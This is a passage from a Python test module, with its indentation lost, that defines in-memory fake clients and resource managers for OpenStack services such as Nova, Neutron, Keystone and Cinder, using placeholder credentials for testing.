kwargs["ip_range"] = {"cidr": kwargs["cidr"]}
del kwargs["cidr"]
for key, value in kwargs.items():
self.items[key] = value
setattr(self, key, value)
class FakeMetric(FakeResource):
def __init_(self, manager=None, **kwargs):
super(FakeMetric, self).__init__(manager)
self.metric = kwargs.get("metric_name")
self.optional_args = kwargs.get("optional_args", {})
class FakeAlarm(FakeResource):
def __init__(self, manager=None, **kwargs):
super(FakeAlarm, self).__init__(manager)
self.meter_name = kwargs.get("meter_name")
self.threshold = kwargs.get("threshold")
self.state = kwargs.get("state", "fake-alarm-state")
self.alarm_id = kwargs.get("alarm_id", "fake-alarm-id")
self.state = kwargs.get("state", "ok")
self.optional_args = kwargs.get("optional_args", {})
class FakeSample(FakeResource):
def __init__(self, manager=None, **kwargs):
super(FakeSample, self).__init__(manager)
self.counter_name = kwargs.get("counter_name", "fake-counter-name")
self.counter_type = kwargs.get("counter_type", "fake-counter-type")
self.counter_unit = kwargs.get("counter_unit", "fake-counter-unit")
self.counter_volume = kwargs.get("counter_volume", 100)
@property
def resource_id(self):
return "fake-resource-id"
def to_dict(self):
return {"counter_name": self.counter_name,
"counter_type": self.counter_type,
"counter_unit": self.counter_unit,
"counter_volume": self.counter_volume,
"resource_id": self.resource_id}
class FakeVolume(FakeResource):
@property
def _info(self):
return {"id": "uuid"}
class FakeVolumeType(FakeResource):
pass
class FakeVolumeTransfer(FakeResource):
pass
class FakeVolumeSnapshot(FakeResource):
pass
class FakeVolumeBackup(FakeResource):
pass
class FakeRole(FakeResource):
pass
class FakeQueue(FakeResource):
def __init__(self, manager=None, name="myqueue"):
super(FakeQueue, self).__init__(manager, name)
self.queue_name = name
self.messages = FakeMessagesManager(name)
def post(self, messages):
for msg in messages:
self.messages.create(**msg)
def messages(self):
return self.messages.list()
class FakeDbInstance(FakeResource):
pass
class FakeMessage(FakeResource):
def __init__(self, manager=None, **kwargs):
super(FakeMessage, self).__init__(manager)
self.body = kwargs.get("body", "fake-body")
self.ttl = kwargs.get("ttl", 100)
class FakeAvailabilityZone(FakeResource):
def __init__(self, manager=None):
super(FakeAvailabilityZone, self).__init__(manager)
self.zoneName = mock.MagicMock()
self.zoneState = mock.MagicMock()
self.hosts = mock.MagicMock()
class FakeWorkbook(FakeResource):
def __init__(self, manager=None):
super(FakeWorkbook, self).__init__(manager)
self.workbook = mock.MagicMock()
class FakeObject(FakeResource):
pass
class FakeBaymodel(FakeResource):
pass
class FakeManager(object):
def __init__(self):
super(FakeManager, self).__init__()
self.cache = {}
self.resources_order = []
def get(self, resource_uuid):
return self.cache.get(resource_uuid)
def delete(self, resource_uuid):
cached = self.get(resource_uuid)
if cached is not None:
cached.status = "DELETED"
del self.cache[resource_uuid]
self.resources_order.remove(resource_uuid)
def _cache(self, resource):
self.resources_order.append(resource.uuid)
self.cache[resource.uuid] = resource
return resource
def list(self, **kwargs):
return [self.cache[key] for key in self.resources_order]
def find(self, **kwargs):
for resource in self.cache.values():
match = True
for key, value in kwargs.items():
if getattr(resource, key, None) != value:
match = False
break
if match:
return resource
class FakeServerManager(FakeManager):
def __init__(self, image_mgr=None):
super(FakeServerManager, self).__init__()
self.images = image_mgr or FakeImageManager()
def get(self, resource_uuid):
server = self.cache.get(resource_uuid)
if server is not None:
return server
raise nova_exceptions.NotFound("Server %s not found" % (resource_uuid))
def _create(self, server_class=FakeServer, name=None):
server = self._cache(server_class(self))
if name is not None:
server.name = name
return server
def create(self, name, image_id, flavor_id, **kwargs):
return self._create(name=name)
def create_image(self, server, name):
image = self.images._create()
return image.uuid
def add_floating_ip(self, server, fip):
pass
def remove_floating_ip(self, server, fip):
pass
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
cached.status = "DELETED"
del self.cache[resource]
self.resources_order.remove(resource)
class FakeImageManager(FakeManager):
def __init__(self):
super(FakeImageManager, self).__init__()
def get(self, resource_uuid):
image = self.cache.get(resource_uuid)
if image is not None:
return image
raise exc.HTTPNotFound("Image %s not found" % (resource_uuid))
def _create(self, image_class=FakeImage, name=None, id=None):
image = self._cache(image_class(self))
image.owner = "dummy"
image.id = image.uuid
if name is not None:
image.name = name
return image
def create(self, name, copy_from, container_format, disk_format):
return self._create(name=name)
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
cached.status = "DELETED"
del self.cache[resource]
self.resources_order.remove(resource)
class FakeStrategyManager(FakeManager):
def get(self, resource_name):
for key in self.resources_order:
if self.cache[key].name == resource_name:
return self.cache[key]
class FakeGoalManager(FakeManager):
def get(self, resource_name):
for key in self.resources_order:
if self.cache[key].name == resource_name:
return self.cache[key]
class FakePackageManager(FakeManager):
def create(self, package_descr, package_arch, package_class=FakeMurano):
package = self._cache(package_class(self))
package.name = list(package_arch.keys())[0]
return package
class FakeFloatingIPsManager(FakeManager):
def create(self):
return FakeFloatingIP(self)
class FakeFloatingIPPoolsManager(FakeManager):
def create(self):
return FakeFloatingIPPool(self)
class FakeTenantsManager(FakeManager):
def create(self, name):
return self._cache(FakeTenant(self, name))
def update(self, tenant_id, name=None, description=None):
tenant = self.get(tenant_id)
name = name or (tenant.name + "_updated")
desc = description or (tenant.name + "_description_updated")
tenant.name = name
tenant.description = desc
return self._cache(tenant)
class FakeNetworkManager(FakeManager):
def create(self, net_id):
net = FakeNetwork(self)
net.id = net_id
return self._cache(net)
class FakeFlavorManager(FakeManager):
def create(self):
flv = FakeFlavor(self)
return self._cache(flv)
class FakeKeypairManager(FakeManager):
def create(self, name, public_key=None):
kp = FakeKeypair(self)
kp.name = name or kp.name
return self._cache(kp)
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
cached.status = "DELETED"
del self.cache[resource]
self.resources_order.remove(resource)
class FakeBaymodelManager(FakeManager):
def create(self, name):
baymodel = FakeBaymodel(self)
baymodel.name = name or baymodel.name
return self._cache(baymodel)
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
del self.cache[resource]
self.resources_order.remove(resource)
class FakeStackManager(FakeManager):
def create(self, name):
stack = FakeStack(self)
stack.name = name or stack.name
return self._cache(stack)
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
cached.status = "DELETE_COMPLETE"
del self.cache[resource]
self.resources_order.remove(resource)
class FakeDomainManager(FakeManager):
def create(self, name):
domain = FakeDomain(self)
domain.name = name or domain.name
return self._cache(domain)
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
cached.status = "DELETE_COMPLETE"
del self.cache[resource]
self.resources_order.remove(resource)
class FakeNovaQuotasManager(FakeManager):
def update(self, tenant_id, **kwargs):
fq = FakeQuotas(self)
return self._cache(fq)
def delete(self, tenant_id):
pass
class FakeCinderQuotasManager(FakeManager):
def update(self, tenant_id, **kwargs):
fq = FakeQuotas(self)
return self._cache(fq)
def delete(self, tenant_id):
pass
class FakeSecurityGroupManager(FakeManager):
def __init__(self, rule_manager=None):
super(FakeSecurityGroupManager, self).__init__()
self.rule_manager = rule_manager
self.create("default")
def create(self, name, description=""):
sg = FakeSecurityGroup(
manager=self,
rule_manager=self.rule_manager)
sg.name = name or sg.name
sg.description = description
return self._cache(sg)
def to_dict(self, obj):
return {"id": obj.id, "name": obj.name}
def find(self, name, **kwargs):
kwargs["name"] = name
for resource in self.cache.values():
match = True
for key, value in kwargs.items():
if getattr(resource, key, None) != value:
match = False
break
if match:
return resource
raise nova_exceptions.NotFound("Security Group not found")
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
cached.status = "DELETED"
del self.cache[resource]
self.resources_order.remove(resource)
class FakeSecurityGroupRuleManager(FakeManager):
def __init__(self):
super(FakeSecurityGroupRuleManager, self).__init__()
def create(self, parent_group_id, **kwargs):
kwargs["parent_group_id"] = parent_group_id
sgr = FakeSecurityGroupRule(self, **kwargs)
return self._cache(sgr)
class FakeUsersManager(FakeManager):
def create(self, username, password, email, tenant_id):
user = FakeUser(manager=self, name=username)
user.name = username or user.name
return self._cache(user)
class FakeServicesManager(FakeManager):
def list(self):
return []
class FakeVolumeManager(FakeManager):
def __init__(self):
super(FakeVolumeManager, self).__init__()
self.__volumes = {}
self.__tenant_id = generate_uuid()
def create(self, size=None, **kwargs):
volume = FakeVolume(self)
volume.size = size or 1
volume.name = kwargs.get("display_name", volume.name)
volume.status = "available"
volume.tenant_id = self.__tenant_id
self.__volumes[volume.id] = volume
return self._cache(volume)
def list(self):
return self.__volumes.values()
def delete(self, resource):
super(FakeVolumeManager, self).delete(resource.id)
del self.__volumes[resource.id]
class FakeVolumeTypeManager(FakeManager):
def create(self, name):
vol_type = FakeVolumeType(self)
vol_type.name = name or vol_type.name
return self._cache(vol_type)
class FakeVolumeTransferManager(FakeManager):
def __init__(self):
super(FakeVolumeTransferManager, self).__init__()
self.__volume_transfers = {}
def list(self):
return self.__volume_transfers.values()
def create(self, name):
transfer = FakeVolumeTransfer(self)
transfer.name = name or transfer.name
self.__volume_transfers[transfer.id] = transfer
return self._cache(transfer)
def delete(self, resource):
super(FakeVolumeTransferManager, self).delete(resource.id)
del self.__volume_transfers[resource.id]
class FakeVolumeSnapshotManager(FakeManager):
def __init__(self):
super(FakeVolumeSnapshotManager, self).__init__()
self.__snapshots = {}
self.__tenant_id = generate_uuid()
def create(self, name, force=False, display_name=None):
snapshot = FakeVolumeSnapshot(self)
snapshot.name = name or snapshot.name
snapshot.status = "available"
snapshot.tenant_id = self.__tenant_id
self.__snapshots[snapshot.id] = snapshot
return self._cache(snapshot)
def list(self):
return self.__snapshots.values()
def delete(self, resource):
super(FakeVolumeSnapshotManager, self).delete(resource.id)
del self.__snapshots[resource.id]
class FakeVolumeBackupManager(FakeManager):
def __init__(self):
super(FakeVolumeBackupManager, self).__init__()
self.__backups = {}
self.__tenant_id = generate_uuid()
def create(self, name):
backup = FakeVolumeBackup(self)
backup.name = name or backup.name
self.__backups[backup.id] = backup
return self._cache(backup)
def list(self):
return self.__backups.values()
def delete(self, resource):
super(FakeVolumeBackupManager, self).delete(resource.id)
del self.__backups[resource.id]
class FakeRolesManager(FakeManager):
def create(self, role_id, name):
role = FakeRole(self)
role.name = name
role.id = role_id
return self._cache(role)
def roles_for_user(self, user, tenant):
role = FakeRole(self)
role.name = "admin"
return [role, ]
def add_user_role(self, user, role, tenant):
pass
class FakeMetricManager(FakeManager):
def create(self, **kwargs):
metric = FakeMetric(self, **kwargs)
return self._cache(metric)
def get(self, metric_id):
metric = self.find(metric_id=metric_id)
return [metric]
class FakeAlarmManager(FakeManager):
def get(self, alarm_id):
alarm = self.find(alarm_id=alarm_id)
if alarm:
return [alarm]
raise ceilometer_exc.HTTPNotFound(
"Alarm with %s not found" % (alarm_id))
def update(self, alarm_id, **fake_alarm_dict_diff):
alarm = self.get(alarm_id)[0]
for attr, value in six.iteritems(fake_alarm_dict_diff):
setattr(alarm, attr, value)
return alarm
def create(self, **kwargs):
alarm = FakeAlarm(self, **kwargs)
return self._cache(alarm)
def delete(self, alarm_id):
alarm = self.find(alarm_id=alarm_id)
if alarm is not None:
alarm.status = "DELETED"
del self.cache[alarm.id]
self.resources_order.remove(alarm.id)
def get_state(self, alarm_id):
alarm = self.find(alarm_id=alarm_id)
if alarm is not None:
return getattr(alarm, "state", "fake-alarm-state")
def get_history(self, alarm_id):
return ["fake-alarm-history"]
def set_state(self, alarm_id, state):
alarm = self.find(alarm_id=alarm_id)
if alarm is not None:
return setattr(alarm, "state", state)
class FakeSampleManager(FakeManager):
def create(self, **kwargs):
sample = FakeSample(self, **kwargs)
return [self._cache(sample)]
def list(self):
return ["fake-samples"]
class FakeMeterManager(FakeManager):
def list(self):
return ["fake-meter"]
class FakeMetricsManager(FakeManager):
def list(self):
return ["fake-metric"]
class FakeCeilometerResourceManager(FakeManager):
def get(self, resource_id):
return ["fake-resource-info"]
def list(self):
return ["fake-resource"]
class FakeStatisticsManager(FakeManager):
def list(self, meter):
return ["%s-statistics" % meter]
class FakeQueryManager(FakeManager):
def query(self, filter, orderby, limit):
return ["fake-query-result"]
class FakeQueuesManager(FakeManager):
def __init__(self):
super(FakeQueuesManager, self).__init__()
self.__queues = {}
def create(self, name):
queue = FakeQueue(self, name)
self.__queues[queue.name] = queue
return self._cache(queue)
def list(self):
return self.__queues.values()
def delete(self, queue):
super(FakeQueuesManager, self).delete(queue.name)
del self.__queues[queue.name]
class FakeDbInstanceManager(FakeManager):
def __init__(self):
super(FakeDbInstanceManager, self).__init__()
self.__db_instances = {}
def create(self, name, flavor_id, size):
instance = FakeDbInstance(self)
instance.name = name or instance.name
instance.flavor_id = flavor_id
instance.size = size
return self._cache(instance)
def list(self):
return self.__db_instances.values()
def delete(self, resource):
if not isinstance(resource, six.string_types):
resource = resource.id
cached = self.get(resource)
if cached is not None:
cached.status = "DELETE_COMPLETE"
del self.cache[resource]
self.resources_order.remove(resource)
class FakeMessagesManager(FakeManager):
def __init__(self, queue="myqueue"):
super(FakeMessagesManager, self).__init__()
self.__queue = queue
self.__messages = {}
def create(self, **kwargs):
message = FakeMessage(self, **kwargs)
self.__messages[message.id] = message
return self._cache(message)
def list(self):
return self.__messages.values()
def delete(self, message):
super(FakeMessagesManager, self).delete(message.id)
del self.__messages[message.id]
class FakeAvailabilityZonesManager(FakeManager):
def __init__(self):
super(FakeAvailabilityZonesManager, self).__init__()
self.zones = FakeAvailabilityZone()
def list(self):
return [self.zones]
class FakeWorkbookManager(FakeManager):
def __init__(self):
super(FakeWorkbookManager, self).__init__()
self.workbook = FakeWorkbook()
def list(self):
return [self.workbook]
class FakeObjectManager(FakeManager):
def get_account(self, **kwargs):
containers = self.list()
return (mock.MagicMock(), [{"name": con.name} for con in containers])
def get_container(self, name, **kwargs):
container = self.find(name=name)
if container is None:
raise swift_exceptions.ClientException("Container GET failed")
return (mock.MagicMock(), [{"name": obj} for obj in container.items])
def put_container(self, name, **kwargs):
if self.find(name=name):
raise swift_exceptions.ClientException("Container PUT failed")
self._cache(FakeObject(name=name))
def delete_container(self, name, **kwargs):
container = self.find(name=name)
if container is None or len(container.items.keys()) > 0:
raise swift_exceptions.ClientException("Container DELETE failed")
self.delete(container.uuid)
def get_object(self, container_name, object_name, **kwargs):
container = self.find(name=container_name)
if container is None or object_name not in container.items:
raise swift_exceptions.ClientException("Object GET failed")
return (mock.MagicMock(), container.items[object_name])
def put_object(self, container_name, object_name, content, **kwargs):
container = self.find(name=container_name)
if container is None:
raise swift_exceptions.ClientException("Object PUT failed")
container.items[object_name] = content
return mock.MagicMock()
def delete_object(self, container_name, object_name, **kwargs):
container = self.find(name=container_name)
if container is None or object_name not in container.items:
raise swift_exceptions.ClientException("Object DELETE failed")
del container.items[object_name]
class FakeServiceCatalog(object):
def get_credentials(self):
return {"image": [{"publicURL": "http://fake.to"}],
"metering": [{"publicURL": "http://fake.to"}],
"monitoring": [{"publicURL": "http://fake.to"}]}
def url_for(self, **kwargs):
return "http://fake.to"
class FakeGlanceClient(object):
def __init__(self):
self.images = FakeImageManager()
class FakeMuranoClient(object):
def __init__(self):
self.packages = FakePackageManager()
class FakeCinderClient(object):
def __init__(self):
self.volumes = FakeVolumeManager()
self.volume_types = FakeVolumeTypeManager()
self.transfers = FakeVolumeTransferManager()
self.volume_snapshots = FakeVolumeSnapshotManager()
self.backups = FakeVolumeBackupManager()
self.quotas = FakeCinderQuotasManager()
class FakeNovaClient(object):
def __init__(self, failed_server_manager=False):
self.images = FakeImageManager()
self.servers = FakeServerManager(self.images)
self.floating_ips = FakeFloatingIPsManager()
self.floating_ip_pools = FakeFloatingIPPoolsManager()
self.networks = FakeNetworkManager()
self.flavors = FakeFlavorManager()
self.keypairs = FakeKeypairManager()
self.security_group_rules = FakeSecurityGroupRuleManager()
self.security_groups = FakeSecurityGroupManager(
rule_manager=self.security_group_rules)
self.quotas = FakeNovaQuotasManager()
self.set_management_url = mock.MagicMock()
self.availability_zones = FakeAvailabilityZonesManager()
class FakeHeatClient(object):
def __init__(self):
self.stacks = FakeStackManager()
class FakeDesignateClient(object):
def __init__(self):
self.domains = FakeDomainManager()
class FakeKeystoneClient(object):
def __init__(self):
self.tenants = FakeTenantsManager()
self.users = FakeUsersManager()
self.roles = FakeRolesManager()
self.project_id = "abc123"
self.auth_url = "http://example.com:5000/v2.0/"
self.auth_token = "fake"
self.auth_user_id = generate_uuid()
self.auth_tenant_id = generate_uuid()
self.service_catalog = FakeServiceCatalog()
self.services = FakeServicesManager()
self.region_name = "RegionOne"
self.auth_ref = mock.Mock()
self.auth_ref.role_names = ["admin"]
self.version = "v2.0"
self.session = mock.MagicMock()
self.authenticate = mock.MagicMock()
def authenticate(self):
return True
def list_users(self):
return self.users.list()
def list_projects(self):
return self.tenants.list()
def list_services(self):
return self.services.list()
def list_roles(self):
return self.roles.list()
def delete_user(self, uuid):
return self.users.delete(uuid)
class FakeCeilometerClient(object):
def __init__(self):
self.alarms = FakeAlarmManager()
self.meters = FakeMeterManager()
self.resources = FakeCeilometerResourceManager()
self.statistics = FakeStatisticsManager()
self.samples = FakeSampleManager()
self.query_alarms = FakeQueryManager()
self.query_samples = FakeQueryManager()
self.query_alarm_history = FakeQueryManager()
class FakeGnocchiClient(object):
def __init__(self):
self.metric = FakeMetricManager()
class FakeMonascaClient(object):
def __init__(self):
self.metrics = FakeMetricsManager()
class FakeNeutronClient(object):
def __init__(self, **kwargs):
self.__networks = {}
self.__subnets = {}
self.__routers = {}
self.__ports = {}
self.__pools = {}
self.__vips = {}
self.__fips = {}
self.__healthmonitors = {}
self.__tenant_id = kwargs.get("tenant_id", generate_uuid())
self.format = "json"
self.version = "2.0"
@staticmethod
def _filter(resource_list, search_opts):
return [res for res in resource_list
if all(res[field] == value
for field, value in search_opts.items())]
def add_interface_router(self, router_id, data):
subnet_id = data["subnet_id"]
if (router_id not in self.__routers or
subnet_id not in self.__subnets):
raise neutron_exceptions.NeutronClientException
subnet = self.__subnets[subnet_id]
port = self.create_port(
{"port": {"network_id": subnet["network_id"]}})["port"]
port["device_id"] = router_id
port["fixed_ips"].append({"subnet_id": subnet_id,
"ip_address": subnet["gateway_ip"]})
return {"subnet_id": subnet_id,
"tenant_id": port["tenant_id"],
"port_id": port["id"],
"id": router_id}
def create_network(self, data):
network = setup_dict(data["network"],
defaults={"name": generate_name("net_"),
"admin_state_up": True})
network_id = generate_uuid()
network.update({"id": network_id,
"status": "ACTIVE",
"subnets": [],
"provider:physical_network": None,
"tenant_id": self.__tenant_id,
"provider:network_type": "local",
"router:external": True,
"shared": False,
"provider:segmentation_id": None})
self.__networks[network_id] = network
return {"network": network}
def create_pool(self, data):
pool = setup_dict(data["pool"],
required=["lb_method", "protocol", "subnet_id"],
defaults={"name": generate_name("pool_"),
"admin_state_up": True})
if pool["subnet_id"] not in self.__subnets:
raise neutron_exceptions.NeutronClientException
pool_id = generate_uuid()
pool.update({"id": pool_id,
"status": "PENDING_CREATE",
"tenant_id": self.__tenant_id})
self.__pools[pool_id] = pool
return {"pool": pool}
def create_vip(self, data):
vip = setup_dict(data["vip"],
required=["protocol_port", "protocol", "subnet_id",
"pool_id"],
defaults={"name": generate_name("vip_"),
"admin_state_up": True})
if (vip["subnet_id"] not in self.__subnets) or (vip["pool_id"] not in
self.__pools):
raise neutron_exceptions.NeutronClientException
vip_id = generate_uuid()
vip.update({"id": vip_id,
"status": "PENDING_CREATE",
"tenant_id": self.__tenant_id})
self.__vips[vip_id] = vip
return {"vip": vip}
def create_floatingip(self, data):
fip = setup_dict(data["floatingip"],
required=["floating_network"],
defaults={"admin_state_up": True})
if (fip["floating_network"] not in self.__nets):
raise neutron_exceptions.NeutronClientException
fip_id = generate_uuid()
fip.update({"id": fip_id,
"tenant_id": self.__tenant_id})
self.__fips[fip_id] = fip
return {"fip": fip}
def create_health_monitor(self, data):
healthmonitor = setup_dict(data["healthmonitor"],
required=["type", "timeout", "delay",
"max_retries"],
defaults={"admin_state_up": True})
healthmonitor_id = generate_uuid()
healthmonitor.update({"id": healthmonitor_id,
"status": "PENDING_CREATE",
"tenant_id": self.__tenant_id})
self.__healthmonitors[healthmonitor_id] = healthmonitor
return {"healthmonitor": healthmonitor}
def create_port(self, data):
port = setup_dict(data["port"],
required=["network_id"],
defaults={"name": generate_name("port_"),
"admin_state_up": True})
if port["network_id"] not in self.__networks:
raise neutron_exceptions.NeutronClientException
port_id = generate_uuid()
port.update({"id": port_id,
"status": "ACTIVE",
"binding:host_id": "fakehost",
"extra_dhcp_opts": [],
"binding:vnic_type": "normal",
"binding:vif_type": "ovs",
"device_owner": "",
"mac_address": generate_mac(),
"binding:profile": {},
"binding:vif_details": {u"port_filter": True},
"security_groups": [],
"fixed_ips": [],
"device_id": "",
"tenant_id": self.__tenant_id,
"allowed_address_pairs": []})
self.__ports[port_id] = port
return {"port": port}
def create_router(self, data):
router = setup_dict(data["router"],
defaults={"name": generate_name("router_"),
"external_gateway_info": None,
"admin_state_up": True})
router_id = generate_uuid()
router.update({"id": router_id,
"status": "ACTIVE",
"external_gateway_info": None,
"tenant_id": self.__tenant_id})
self.__routers[router_id] = router
return {"router": router}
def create_subnet(self, data):
subnet = setup_dict(
data["subnet"],
required=["network_id", "cidr", "ip_version"],
defaults={"name": generate_name("subnet_"),
"dns_nameservers": ["8.8.8.8", "8.8.4.4"]})
if subnet["network_id"] not in self.__networks:
raise neutron_exceptions.NeutronClientException
subnet_id = generate_uuid()
subnet.update({"id": subnet_id,
"enable_dhcp": True,
"tenant_id": self.__tenant_id,
"ipv6_ra_mode": None,
"allocation_pools": [],
"gateway_ip": re.sub("./.*$", "1", subnet["cidr"]),
"ipv6_address_mode": None,
"ip_version": 4,
"host_routes": []})
self.__subnets[subnet_id] = subnet
return {"subnet": subnet}
def update_resource(self, resource_id, resource_dict, data):
if resource_id not in resource_dict:
raise neutron_exceptions.NeutronClientException
self.resource_list[resource_id].update(data)
def update_network(self, network_id, data):
self.update_resource(network_id, self.__networks, data)
def update_pool(self, pool_id, data):
self.update_resource(pool_id, self.__pools, data)
def update_vip(self, vip_id, data):
self.update_resource(vip_id, self.__vips, data)
def update_health_monitor(self, healthmonitor_id, data):
self.update_resource(healthmonitor_id, self.__healthmonitors, data)
def update_subnet(self, subnet_id, data):
self.update_resource(subnet_id, self.__subnets, data)
def update_port(self, port_id, data):
self.update_resource(port_id, self.__ports, data)
def update_router(self, router_id, data):
self.update_resource(router_id, self.__routers, data)
def delete_network(self, network_id):
if network_id not in self.__networks:
raise neutron_exceptions.NeutronClientException
for port in self.__ports.values():
if port["network_id"] == network_id:
# Network is in use by port
raise neutron_exceptions.NeutronClientException
del self.__networks[network_id]
return ""
def delete_pool(self, pool_id):
if pool_id not in self.__pools:
raise neutron_exceptions.NeutronClientException
del self.__pools[pool_id]
return ""
def delete_vip(self, vip_id):
if vip_id not in self.__vips:
raise neutron_exceptions.NeutronClientException
del self.__vips[vip_id]
def delete_health_monitor(self, healthmonitor_id):
if healthmonitor_id not in self.__healthmonitors:
raise neutron_exceptions.NeutronClientException
del self.__healthmonitors[healthmonitor_id]
return ""
def delete_floatingip(self, fip_id):
if fip_id not in self.__fips:
raise neutron_exceptions.NeutronClientException
del self.__fips[fip_id]
return ""
def delete_port(self, port_id):
if port_id not in self.__ports:
raise neutron_exceptions.PortNotFoundClient
if self.__ports[port_id]["device_owner"]:
# Port is owned by some device
raise neutron_exceptions.NeutronClientException
del self.__ports[port_id]
return ""
def delete_router(self, router_id):
if router_id not in self.__routers:
raise neutron_exceptions.NeutronClientException
for port in self.__ports.values():
if port["device_id"] == router_id:
# Router has active port
raise neutron_exceptions.NeutronClientException
del self.__routers[router_id]
return ""
def delete_subnet(self, subnet_id):
if subnet_id not in self.__subnets:
raise neutron_exceptions.NeutronClientException
for port in self.__ports.values():
for fip in port["fixed_ips"]:
if fip["subnet_id"] == subnet_id:
# Subnet has IP allocation from some port
raise neutron_exceptions.NeutronClientException
del self.__subnets[subnet_id]
return ""
def list_networks(self, **search_opts):
nets = self._filter(self.__networks.values(), search_opts)
return {"networks": nets}
def list_pools(self, **search_opts):
pools = self._filter(self.__pools.values(), search_opts)
return {"pools": pools}
def list_vips(self, **search_opts):
vips = self._filter(self.__vips.values(), search_opts)
return {"vips": vips}
def list_health_monitors(self, **search_opts):
healthmonitors = self._filter(
self.__healthmonitors.values(), search_opts)
return {"healthmonitors": healthmonitors}
def list_ports(self, **search_opts):
ports = self._filter(self.__ports.values(), search_opts)
return {"ports": ports}
def list_routers(self, **search_opts):
routers = self._filter(self.__routers.values(), search_opts)
return {"routers": routers}
def list_subnets(self, **search_opts):
subnets = self._filter(self.__subnets.values(), search_opts)
return {"subnets": subnets}
def list_floatingips(self, **search_opts):
fips = self._filter(self.__fips.values(), search_opts)
return {"floatingips": fips}
def remove_interface_router(self, router_id, data):
subnet_id = data["subnet_id"]
if (router_id not in self.__routers
or subnet_id not in self.__subnets):
raise neutron_exceptions.NeutronClientException
subnet = self.__subnets[subnet_id]
for port_id, port in self.__ports.items():
if port["device_id"] == router_id:
for fip in port["fixed_ips"]:
if fip["subnet_id"] == subnet_id:
del self.__ports[port_id]
return {"subnet_id": subnet_id,
"tenant_id": subnet["tenant_id"],
"port_id": port_id,
"id": router_id}
raise neutron_exceptions.NeutronClientException
def associate_health_monitor(self, pool_id, healthmonitor_id):
if pool_id not in self.__pools:
raise neutron_exceptions.NeutronClientException
if healthmonitor_id not in self.__healthmonitors:
raise neutron_exceptions.NeutronClientException
self.__pools[pool_id]["pool"]["healthmonitors"] = healthmonitor_id
return {"pool": self.__pools[pool_id]}
def disassociate_health_monitor(self, pool_id, healthmonitor_id):
if pool_id not in self.__pools:
raise neutron_exceptions.NeutronClientException
if healthmonitor_id not in self.__healthmonitors:
raise neutron_exceptions.NeutronClientException
del self.__pools[pool_id]["pool"]["healthmonitors"][healthmonitor_id]
return ""
class FakeIronicClient(object):
def __init__(self):
# TODO(romcheg):Fake Manager subclasses to manage BM nodes.
pass
class FakeSaharaClient(object):
def __init__(self):
self.job_executions = mock.MagicMock()
self.jobs = mock.MagicMock()
self.job_binary_internals = mock.MagicMock()
self.job_binaries = mock.MagicMock()
self.data_sources = mock.MagicMock()
self.clusters = mock.MagicMock()
self.cluster_templates = mock.MagicMock()
self.node_group_templates = mock.MagicMock()
self.setup_list_methods()
def setup_list_methods(self):
mock_with_id = mock.MagicMock()
mock_with_id.id = 42
# First call of list returns a list with one object, the next should
# empty after delete.
self.job_executions.list.side_effect = [[mock_with_id], []]
self.jobs.list.side_effect = [[mock_with_id], []]
self.job_binary_internals.list.side_effect = [[mock_with_id], []]
self.job_binaries.list.side_effect = [[mock_with_id], []]
self.data_sources.list.side_effect = [[mock_with_id], []]
self.clusters.list.side_effect = [[mock_with_id], []]
self.cluster_templates.list.side_effect = [[mock_with_id], []]
self.node_group_templates.list.side_effect = [[mock_with_id], []]
class FakeZaqarClient(object):
def __init__(self):
self.queues = FakeQueuesManager()
def queue(self, name, **kwargs):
return self.queues.create(name, **kwargs)
class FakeTroveClient(object):
def __init__(self):
self.instances = FakeDbInstanceManager()
class FakeMistralClient(object):
def __init__(self):
self.workbook = FakeWorkbookManager()
class FakeSwiftClient(FakeObjectManager):
pass
class FakeEC2Client(object):
def __init__(self):
pass
class FakeCueClient(object):
def __init__(self):
pass
class FakeSenlinClient(object):
def __init__(self):
# TODO(Yanyan Hu):Fake interfaces of senlinclient.
pass
class FakeMagnumClient(object):
def __init__(self):
self.baymodels = FakeBaymodelManager()
class FakeWatcherClient(object):
def __init__(self):
self.strategy = FakeStrategyManager()
self.goal = FakeGoalManager()
class FakeClients(object):
def __init__(self, credential_=None):
self._nova = None
self._glance = None
self._keystone = None
self._cinder = None
self._neutron = None
self._sahara = None
self._heat = None
self._designate = None
self._ceilometer = None
self._zaqar = None
self._trove = None
self._mistral = None
self._swift = None
self._murano = None
self._monasca = None
self._ec2 = None
self._senlin = None
self._watcher = None
self._credential = credential_ or objects.Credential(
"http://fake.example.org:5000/v2.0/",
"fake_username",
"fake_password",
"fake_tenant_name")
def keystone(self):
if not self._keystone:
self._keystone = FakeKeystoneClient()
return self._keystone
def verified_keystone(self):
return self.keystone()
def nova(self):
if not self._nova:
self._nova = FakeNovaClient()
return self._nova
def glance(self):
if not self._glance:
self._glance = FakeGlanceClient()
return self._glance
def cinder(self):
if not self._cinder:
self._cinder = FakeCinderClient()
return self._cinder
def neutron(self):
if not self._neutron:
self._neutron = FakeNeutronClient()
return self._neutron
def sahara(self):
if not self._sahara:
self._sahara = FakeSaharaClient()
return self._sahara
def heat(self):
if not self._heat:
self._heat = FakeHeatClient()
return self._heat
def designate(self):
if not self._designate:
self._designate = FakeDesignateClient()
return self._designate
def ceilometer(self):
if not self._ceilometer:
self._ceilometer = FakeCeilometerClient()
return self._ceilometer
def monasca(self):
if not self._monasca:
self._monasca = FakeMonascaClient()
return self._monasca
def zaqar(self):
if not self._zaqar:
self._zaqar = FakeZaqarClient()
return self._zaqar
def trove(self):
if not self._trove:
self._trove = FakeTroveClient()
return self._trove
def mistral(self):
if not self._mistral:
self._mistral = FakeMistralClient()
return self._mistral
def swift(self):
if not self._swift:
self._swift = FakeSwiftClient()
return self._swift
def murano(self):
if not self._murano:
self._murano = FakeMuranoClient()
return self._murano
def ec2(self):
if not self._ec2:
self._ec2 = FakeEC2Client()
return self._ec2
def senlin(self):
if not self._senlin:
self._senlin = FakeSenlinClient()
return self._senlin
def watcher(self):
if not self._watcher:
self._watcher = FakeWatcherClient()
return self._watcher
class FakeRunner(object):
